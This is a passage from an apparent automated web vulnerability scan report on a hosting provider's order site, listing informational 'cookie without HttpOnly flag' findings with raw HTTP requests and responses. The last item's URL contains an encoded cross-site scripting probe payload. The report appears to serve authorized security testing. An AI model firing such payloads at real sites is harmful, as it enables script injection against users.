Content-Type: text/html;charset=UTF-8
Content-Length: 18612


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.118. http://order.1and1.com/xml/order/Mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:51 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=68e33d48799c0000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Mail;jsessionid=494CF76349396E5319162393A564CAF3.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.119. http://order.1and1.com/xml/order/Mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.120. http://order.1and1.com/xml/order/MailInstantMail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailInstantMail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:24:18 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=16f7de2564d56000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailInstantMail;jsessionid=A41BA9C3172F8DD1EA8E113FC5DD030B.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.121. http://order.1and1.com/xml/order/MailInstantMail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:29 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:36 GMT; Path=/
ETag: 5bfc66b9517d399c2c12a418498321d1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25381


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.122. http://order.1and1.com/xml/order/MailXchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailXchange HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:24:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=786f94fc96f1d800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailXchange;jsessionid=96240D18BB57256D1CB11B0EC7E7B897.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.123. http://order.1and1.com/xml/order/MailXchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:52 GMT; Path=/
ETag: 80d79fb7f81c76e6606c17b109cfe0c5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24474


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.124. http://order.1and1.com/xml/order/MicrosoftExchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MicrosoftExchange HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:24:49 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3ab11e06d79b6c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MicrosoftExchange;jsessionid=92D951397703AF6BB4EB37A053C0817D.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.125. http://order.1and1.com/xml/order/MicrosoftExchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:25:20 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:39:27 GMT; Path=/
ETag: 99e72a9f4366afaae938dfca2d6367b6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26758


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.126. http://order.1and1.com/xml/order/Moneyback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Moneyback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Moneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:51:59 GMT; Path=/
ETag: 68815fe823ebc876487b28a0df9b9810
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15902


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.127. http://order.1and1.com/xml/order/Moneyback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Moneyback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Moneyback HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=62ccfd6dea1ab800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Moneyback;jsessionid=E0197E0A08B7E3EE887DD1789AA270BA.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.128. http://order.1and1.com/xml/order/MsHosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.129. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://burp/show/16
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCoeJlZ2PC8wLCswLSosJiYkJig=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:5:AAABLtRV*lKZz6xm29DD7n8Tbz9KytaA:1300642527826; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:36:09 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1bedc423003cf400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
